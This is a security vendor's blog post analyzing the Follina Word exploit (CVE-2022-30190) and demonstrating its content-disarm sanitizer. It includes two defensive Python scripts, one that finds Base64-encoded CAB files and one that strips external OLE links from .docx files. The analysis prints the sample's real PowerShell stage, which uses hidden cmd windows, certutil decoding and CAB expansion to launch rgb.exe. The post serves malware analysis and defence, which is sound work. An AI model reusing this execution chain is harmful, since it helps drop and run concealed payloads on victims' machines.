Threat Zone-CDR: Defeat the Unknown — Follina
Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability discovered in May 2022. It was first mentioned publicly in this tweet.
This vulnerability abuses the Microsoft Windows Support Diagnostic Tool (MSDT) to gain remote code execution. Attackers exploited it by embedding a malicious external link in an OLE object inside a Word document. It is a simple yet effective phishing attack.
In this blog, we will analyze the Follina Malware sample and use our CDR module to defeat the attack.
Technical Analysis
The Follina zero-day was first seen in the wild in this Microsoft Word document:
This attack relies on tricking the victim into clicking and opening the malformed document, although security researcher Kevin Beaumont says that “if you change the document to RTF form, it runs without even opening the document”.
The document contains an external link to a malicious HTML reference in its relationship file.
When the victim clicks on the document, it connects to the external web link:
The JavaScript code contains a Base64-encoded payload. Decoding the payload reveals a PowerShell script:
$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
The PowerShell code performs these steps, each in a hidden cmd.exe window:
- Kills msdt.exe if it is running
- Loops through %temp% (recursively) for the file "05-2022-0438.rar" and copies it to C:\Users\Public as "1.rar"
- Searches "1.rar" for the Base64-encoded CAB file (lines containing TVNDRgAAAA, the encoded MSCF header) and saves them as "1.t"
- Decodes "1.t" with certutil and saves the result as "1.c"
- Expands the CAB file "1.c" and executes the extracted file "rgb.exe"
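The `findstr TVNDRgAAAA` step works because "TVNDRgAAAA" is simply the Base64 encoding of the CAB magic bytes (MSCF followed by four zero bytes). The same property lets a defender scan a file or a log capture for Base64 blobs that decode to a CAB archive. The following is an added example written for this post, not code from the Follina sample or from Threat Zone; the carrier text and the fake CAB header inside it are constructed for the example.

```python
"""Locate Base64-encoded CAB archives hidden inside another file.

Added example (not code from the Follina payload or from Threat Zone).
A CAB starts with the bytes "MSCF" and four reserved zero bytes, so any
Base64-encoded CAB starts with the characters TVNDRgAAAA. We look for
Base64 runs with that prefix, decode them and confirm the magic bytes.
"""
import base64
import re

CAB_MAGIC = b"MSCF\x00\x00\x00\x00"

# First 10 Base64 characters of any CAB header; this is the string the
# Follina chain searched for with findstr.
CAB_B64_PREFIX = base64.b64encode(CAB_MAGIC).decode()[:10]   # "TVNDRgAAAA"

# A run of Base64 alphabet characters with optional padding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_base64_cabs(text):
    """Return the decoded bytes of every Base64 run in text that decodes to a CAB."""
    found = []
    for match in B64_BLOB.finditer(text):
        blob = match.group(0)
        if not blob.startswith(CAB_B64_PREFIX):
            continue                      # cheap prefix check before decoding
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:                # bad padding / length: not Base64
            continue
        if data.startswith(CAB_MAGIC):    # confirm after decoding
            found.append(data)
    return found


# Constructed carrier: a fake CAB (magic + zeros + marker text), Base64-encoded
# and dropped between unrelated lines, plus a decoy Base64 run that is not a CAB.
FAKE_CAB = CAB_MAGIC + b"\x00" * 28 + b"fake-cab-body"
SAMPLE_CARRIER = "\n".join([
    "Rar!  constructed carrier header",
    base64.b64encode(b"this is not a cabinet file").decode(),
    base64.b64encode(FAKE_CAB).decode(),
    "trailing junk",
])


def scan_sample():
    """Run the detector over the constructed carrier and return what it found."""
    return find_base64_cabs(SAMPLE_CARRIER)


if __name__ == "__main__":
    for payload in scan_sample():
        print("embedded CAB found, %d bytes, starts with %r" % (len(payload), payload[:4]))
```

The prefix check keeps the scan cheap on large inputs, and the post-decode check on the magic bytes avoids false positives from arbitrary Base64 text that happens to begin with the same characters.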
As we can see, the payload uses the “ms-msdt” scheme to execute PowerShell code. MSDT is a support tool, but it allows code execution even if macros are disabled.
After Follina was published, Microsoft advised users to disable the MSDT URL protocol, but by then it can already be too late.
No matter how hard you try to raise employee awareness of phishing attacks, you cannot eliminate the human factor. This is why ThreatZone protects you from known and unknown threats like the Follina zero-day before the attack executes: we provide our CDR (Content Disarm and Reconstruction) module to defeat such attacks.
Sanitize Maldoc with Threat Zone CDR
As the image below shows, the CDR module sanitized the oleObject relationship from the malicious document.
After sanitization, the document no longer contains the malicious external link to the HTML file. Even if the victim opens the document, they will not be exposed to any malware. Threat Zone CDR gives the user a threat-safe document while preserving the file’s integrity.
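To make the relationship-file detail concrete (the external HTML reference described earlier and the oleObject relationship that CDR removes), here is an added example, written for this post and not Threat Zone’s CDR code, that inspects a .docx for external oleObject relationships and writes a copy with them removed. The sample document it builds is constructed for the example and points at a placeholder host; a real document would also carry an o:OLEObject element in word/document.xml referencing the same Id.

```python
"""Detect and strip external OLE-object relationships from a .docx.

Added example; not Threat Zone's CDR implementation. A .docx is a zip
archive, and the main document's relationships live in
word/_rels/document.xml.rels. The Follina document carried a Relationship
whose Type ends in /oleObject, whose TargetMode is "External" and whose
Target is a remote URL. The sample built here is constructed and uses a
placeholder URL.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
RELS_PATH = "word/_rels/document.xml.rels"

# Keep the default namespace (no ns0: prefix) when re-serializing the rels file.
ET.register_namespace("", RELS_NS)


def build_sample_docx(target_url):
    """Construct a minimal .docx whose rels file has one external oleObject."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_TYPE_BASE}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId1337" Type="{REL_TYPE_BASE}oleObject" '
        f'Target="{target_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # stub parts, enough for the demo
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/styles.xml", "<styles/>")
        zf.writestr(RELS_PATH, rels)
    return buf.getvalue()


def _read_rels(docx_bytes):
    """Parse the main document's relationships file, or None if absent."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return None
        return ET.fromstring(zf.read(RELS_PATH))


def _is_external_ole(rel):
    return rel.get("Type", "").endswith("/oleObject") and rel.get("TargetMode") == "External"


def find_external_ole_rels(docx_bytes):
    """Return [(Id, Target), ...] for every external oleObject relationship."""
    root = _read_rels(docx_bytes)
    if root is None:
        return []
    return [(r.get("Id"), r.get("Target"))
            for r in root.findall(f"{{{RELS_NS}}}Relationship") if _is_external_ole(r)]


def relationship_ids(docx_bytes):
    """All relationship Ids present; used to confirm benign relationships survive."""
    root = _read_rels(docx_bytes)
    if root is None:
        return []
    return [r.get("Id") for r in root.findall(f"{{{RELS_NS}}}Relationship")]


def sanitize_docx(docx_bytes):
    """Return (sanitized_bytes, removed_count) with external oleObject rels dropped."""
    root = _read_rels(docx_bytes)
    if root is None:
        return docx_bytes, 0
    bad = [r for r in root.findall(f"{{{RELS_NS}}}Relationship") if _is_external_ole(r)]
    for rel in bad:
        root.remove(rel)
    new_rels = ET.tostring(root, encoding="UTF-8", xml_declaration=True)
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src:
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for item in src.infolist():   # copy every part, swapping in the cleaned rels
                data = new_rels if item.filename == RELS_PATH else src.read(item.filename)
                dst.writestr(item.filename, data)
    return out.getvalue(), len(bad)


if __name__ == "__main__":
    sample = build_sample_docx("http://placeholder.invalid/follina.html")  # constructed URL
    print("external oleObject relationships:", find_external_ole_rels(sample))
    clean, removed = sanitize_docx(sample)
    print("removed:", removed, "remaining ids:", relationship_ids(clean))
```

The detector looks only at word/_rels/document.xml.rels; other parts (headers, footers, embedded objects) have their own .rels files that a complete scan would cover the same way, and a production sanitizer would also drop the o:OLEObject element in document.xml that references the removed Id so Word does not see a dangling reference.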
Scanning the sanitized file with VirusTotal shows that the document is safe.
So, as you can see, antivirus can fail to provide adequate security, whereas CDR does not rely on detection.
It is essential to use a CDR solution when zero-day or unknown threats occur, as antivirus products may fail to detect newly emerging attack vectors.
Threat Zone CDR delivers a threat-safe, ready-to-use file in less than a second.
References
- https://twitter.com/nao_sec/status/1530196847679401984
- https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
Thanks for reading!
Article by Nur Pabuccu
LinkedIn: https://www.linkedin.com/in/nurpabuccu/